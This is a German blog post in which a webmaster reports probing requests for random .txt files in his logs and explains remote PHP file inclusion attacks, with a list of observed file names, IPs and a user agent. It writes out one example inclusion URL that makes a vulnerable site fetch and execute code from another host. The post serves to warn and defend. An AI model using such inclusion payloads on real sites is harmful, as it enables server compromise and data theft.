Heute habe ich mal wieder einen dubiosen Besucher registriert, der versucht hat, die Datei mit dem Namen mqhdxpye.txt auf meinem Server aufzurufen. Blöd für ihn, dass eine solche Datei auf meinem Server gar nicht existiert. In der Sache selbst handelt es sich um die gleiche Art von Zugriffsversuchen wie bereits auf die Dateien rdosxapb.txt oder sjutd.txt. Die Aufrufe kamen heute von der IP 139.196.105.40 mit dem User Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1). Das ist zumindest der selbe User Agent wie bei den Aufrufen der Datei rdosxapb.txt.
Mittlerweile konnte ich etwas Licht ins Dunkle bringen, was mit den Zugriffsversuchen bezweckt wird. Mittels PHP-Injection versucht der Angreifer, fremde Server zu kompromittieren. Allerdings geht es ihm weniger darum, sich großartig in das System zu hacken oder wichtige Daten abzugreifen. Der Angreifer will lediglich eine kleine Text-Datei auf deinen Webspace hochladen. Ist ihm dies gelungen, verschwindet er in der Regel sofort wieder. Denn wie gesagt, ist er an dir oder deinen Daten nicht interessiert. Er braucht dich beziehungsweise deinen Webspace vielmehr zur Verschleierung weiterer Angriffe auf andere Opfer. In der Textdatei befinden sich eine Vielzahl von PHP-Commands.
Nachdem der Angreifer es geschafft hat, dir mittels PHP-Injection eine solche Textdatei unterzujubeln, wendet er sich anderen Webseiten zu. Diese greift er ebenfalls mittels PHP-Injection an. Allerdings verschleiert er seine Spur, indem er versucht, das PHP-Script der Seite dazu zu bringen, die zuvor bei dir hochgeladene Textdatei abzurufen und zu parsen. Das sieht dann beispielsweise so aus, dass er die fremde Seite so aufruft: „www.fremde-seite.de?id=http://www.deine-webseite.de/mqhdxpye.txt?“ Damit will er die angegriffene Seite dazu bringen, die Textdatei von deinem Server zu laden und den darin enthaltenen PHP-Code auszuführen. Zur Verschleierung wird eine Kette über auf mehrere Server verteilte Textdateien gebildet.
Schafft es der Angreifer, den auf deinem Server in der Textdatei liegenden PHP-Code auf der fremden Seite auszuführen, ändert er damit beispielsweise – wenn der angegriffene Server nicht ausreichend geschützt ist – die Rechtevergabe und richtet neue Benutzer mit Vollzugriff auf das Dateisystem ein. Damit kann er dann tiefer in das System eindringen und Datenbanken absaugen, etc. Ich habe mir mal spasseshalber eine solche Textdatei von einem fremden Server runtergeladen. Denn Link zu der Webseite hatte ich, weil ein solcher Angreifer versucht hatte, die auf dem fremden Server liegende Textdatei bei mir auszuführen. Erstaunlicherweise hat direkt Avira angeschlagen, als ich die Textdatei auf meinem Rechner gespeichert habe. Die Masche scheint also schon hinlänglich bekannt zu sein.
Ich hoffe, der ein oder andere kann sich meine bisherigen Erkenntnisse zu Nutze machen und sein System entsprechend schützen oder zumindest ein wachsameres Auge darauf haben.
P.S.: Hier noch eine Liste von Textdateien, auf die es Zugriffsversuche gab, immer mit dem Useragent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1):
- sjutd.txt
- rdosxapb.txt
- mqhdxpye.txt | IP: 139.196.105.40
- siwywuvu.txt | IP: 183.24.141.132
- x7.txt | IP: 200.98.129.97
- gtmkjmpp.txt | IP: 58.83.245.135
- uqlexedq.txt | IP: 120.76.164.85
- cjrjrndy.txt | IP: 88.249.32.219
- tllitsce.txt | IP: 139.196.253.161
- giqhauxq.txt | IP: 123.138.189.234
- ohtltcjq.txt | IP: 103.19.233.6